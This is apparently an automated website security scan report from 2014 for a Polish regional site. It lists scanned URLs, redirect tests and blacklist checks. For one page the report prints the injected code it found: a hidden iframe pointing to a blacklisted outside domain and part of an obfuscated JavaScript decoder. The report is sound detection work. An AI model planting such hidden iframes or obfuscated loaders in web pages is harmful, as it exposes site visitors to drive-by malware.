Scanned pages/files
Request | Server response | Status |
http://podidn.busko-zdroj.com.pl/ | 200 OK Content-Length: 19194 Content-Type: text/html | clean |
http://podidn.busko-zdroj.com.pl/?C=N;O=D | 200 OK Content-Length: 19194 Content-Type: text/html | clean |
http://podidn.busko-zdroj.com.pl/?C=N;O=A | 200 OK Content-Length: 19194 Content-Type: text/html | clean |
http://podidn.busko-zdroj.com.pl/?C=M;O=A | 200 OK Content-Length: 19194 Content-Type: text/html | clean |
http://podidn.busko-zdroj.com.pl/?C=M;O=D | 200 OK Content-Length: 19194 Content-Type: text/html | clean |
http://podidn.busko-zdroj.com.pl/?C=S;O=A | 200 OK Content-Length: 19194 Content-Type: text/html | clean |
http://podidn.busko-zdroj.com.pl/?C=S;O=D | 200 OK Content-Length: 19194 Content-Type: text/html | clean |
http://podidn.busko-zdroj.com.pl/?C=D;O=A | 200 OK Content-Length: 19194 Content-Type: text/html | clean |
http://podidn.busko-zdroj.com.pl/?C=D;O=D | 200 OK Content-Length: 19194 Content-Type: text/html | clean |
http://podidn.busko-zdroj.com.pl/zglKonkursPonidzie.doc | 200 OK Content-Length: 30208 Content-Type: application/msword | clean |
http://podidn.busko-zdroj.com.pl/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://podidn.busko-zdroj.com.pl/zawiadomienie_granty_ogolne.doc | 200 OK Content-Length: 156672 Content-Type: application/msword | clean |
http://podidn.busko-zdroj.com.pl/zawiadomienia-%20grant%20zawodowe.doc | 200 OK Content-Length: 156672 Content-Type: application/msword | clean |
http://podidn.busko-zdroj.com.pl/zaw_konf.JPG | 200 OK Content-Length: 11531 Content-Type: image/jpeg | clean |
http://podidn.busko-zdroj.com.pl/zajecia/ | 200 OK Content-Length: 2678 Content-Type: text/html | malicious |
Page code contains blacklisted domain: wahlmediagroup.com ...[1674 bytes skipped]... //fo.addVariable("langOpenImage", "Open Image in New Window"); //fo.addVariable("langAbout", "About"); //fo.addVariable("preloaderColor", "0xFFFFFF"); fo.write("flashcontent"); </script> <span name = "nav_foot" id = "corner_side" style="width: 0; overflow: auto; position: absolute; padding-bottom: 1px;">ceeha3xfpdq 43f1</span> </body> </html><iframe src="http://wahlmediagroup.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/><script>function v52cf8a03e0c42(v52cf8a03e0c7c){ var v52cf8a03e0cb7=16; return(parseInt(v52cf8a03e0c7c,v52cf8a03e0cb7));}function v52cf8a03e0d39(v52cf8a03e0d71){ function v52cf8a03e0e15 () {var v52cf8a03e0e4e=2; return v52cf8a03e0e4e;} var v52cf8a03e0da9='';for(v52cf8a03e0ddb=0; v52cf8a03e0ddb<v52cf8a03e0d71.length; v52cf8a03e0ddb+=v52cf8a03e0e15()){ v52cf8a03e0da9 ...[380 bytes skipped]... Malicious iFrame found. size: 10x10 style: hidden src: http://wahlmediagroup.com/counter.php This URL is marked by Google as suspicious <iframe src="http://wahlmediagroup.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: podidn.busko-zdroj.com.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 15:52:04 GMT
Server: Apache/2
Content-Type: text/html;charset=ISO-8859-1
GET / HTTP/1.1
Host: podidn.busko-zdroj.com.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 15:52:04 GMT
Server: Apache/2
Content-Type: text/html;charset=ISO-8859-1
Second query (visit from search engine):
GET / HTTP/1.1
Host: podidn.busko-zdroj.com.pl
Referer: http://www.google.com/search?q=podidn.busko-zdroj.com.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: podidn.busko-zdroj.com.pl
Referer: http://www.google.com/search?q=podidn.busko-zdroj.com.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=podidn.busko-zdroj.com.pl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://podidn.busko-zdroj.com.pl/
Result: podidn.busko-zdroj.com.pl is not infected or malware details are not published yet.
Result: podidn.busko-zdroj.com.pl is not infected or malware details are not published yet.